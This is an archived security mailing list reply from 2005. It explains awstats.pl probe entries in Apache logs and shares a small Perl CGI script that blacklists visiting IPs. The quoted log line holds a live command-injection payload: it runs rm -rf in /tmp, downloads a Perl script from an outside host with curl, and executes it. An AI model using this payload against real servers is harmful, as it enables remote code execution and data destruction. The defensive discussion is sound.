Security Basics mailing list archives
Re: GET //awstats.pl? in apache logs
From: "S.A. Birl" <sbirl () temple edu>
Date: Mon, 24 Oct 2005 10:23:39 -0400 (EDT)
On Oct 21, Konstantine (nospam-listclient () gmail com ns) typed: Konstantine: My apache logs show rows after rows of following, all from Konstantine: various IP addresses. This started a couple of days ago. I Konstantine: don't have awstats. Could somebody tell me what is that? Is Konstantine: there anything I should be doing? thanks.K. Konstantine: Konstantine: GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1 awstats.pl, I believe, is the AccessWatch log statistics program used to provide stat details for webservers. However, that particular entry was try to find an exploit, but since you dont have it, the web server should have returned a 404. No harm. You can ignore those, unless you see the server suddenly return a 200 instead of the 404. Or, you could do what I did: Write your own PERL script to caputre the offending IP, write it out to an external blacklist (that Apache includes in it's httpd.conf); restart Apache and viola! IP banned. ================================================================== #!/usr/bin/perl -T -w use warnings; use strict; my $IP; $ENV{PATH}="/usr/bin"; printf("Content-Type: text/html\n\n"); $IP=$ENV{"REMOTE_ADDR"}; open(OUTPUT, ">>/usr/local/apache/nobody/banned") or die; printf(OUTPUT "\t# %s\n", $0); printf(OUTPUT "\tDeny from %s\n", $IP); close(OUTPUT); system("/usr/bin/touch /usr/local/apache/nobody/restart"); ================================================================== If you view this URL, your IP blacklisted within 2 seconds: http://concept.temple.edu/cgi-bin/awstats.pl Comments/Criticism required. :) Thanks Scott Birl http://concept.temple.edu/sysadmin/ Senior Systems Administrator Computer Services Temple University ====*====*====*====*====*====*====*====+====*====*====*====*====*====*====*====*
Current thread:
- GET //awstats.pl? in apache logs Konstantine (Oct 24)
- Re: GET //awstats.pl? in apache logs ilaiy (Oct 24)
- Re: GET //awstats.pl? in apache logs Andreas Constantinides (MegaHz) (Oct 24)
- Re: GET //awstats.pl? in apache logs FocusHacks (Oct 24)
- Re: GET //awstats.pl? in apache logs Can't dig that daddy (Oct 24)
- RE: GET //awstats.pl? in apache logs mail list (Oct 24)
- Message not available
- Fwd: GET //awstats.pl? in apache logs Tobias Hahn (Oct 25)
- RE: GET //awstats.pl? in apache logs mail list (Oct 24)
- Re: GET //awstats.pl? in apache logs S.A. Birl (Oct 24)
- Re: GET //awstats.pl? in apache logs Konstantine (Oct 25)
- <Possible follow-ups>
- Re: GET //awstats.pl? in apache logs [a] (Oct 24)